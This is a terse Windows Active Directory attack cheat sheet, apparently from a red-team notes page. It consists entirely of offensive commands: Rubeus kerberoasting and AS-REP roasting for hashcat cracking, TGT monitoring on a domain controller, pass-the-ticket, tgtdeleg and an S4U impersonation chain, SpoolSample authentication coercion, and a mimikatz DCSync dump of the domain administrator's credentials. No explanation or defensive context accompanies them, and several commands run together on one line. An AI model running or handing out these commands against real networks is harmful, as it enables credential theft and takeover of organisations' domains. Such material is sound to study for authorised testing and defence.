Domain Recon - Windows
rubeus.exe kerberoast /user:svc_sql /nowraprubeus.exe asreproast /format:hashcat /user:svc_sql /nowraprubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap
Spoolsample.exe reddc redsqlw
rubeus.exe ptt /ticket:[ticket]
mimikatz # lsadump::dcsync /domain:red.com /user:RED\administratorrubeus.exe tgtdeleg /nowrap
rubeus.exe s4u /impersonate:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /pttLast updated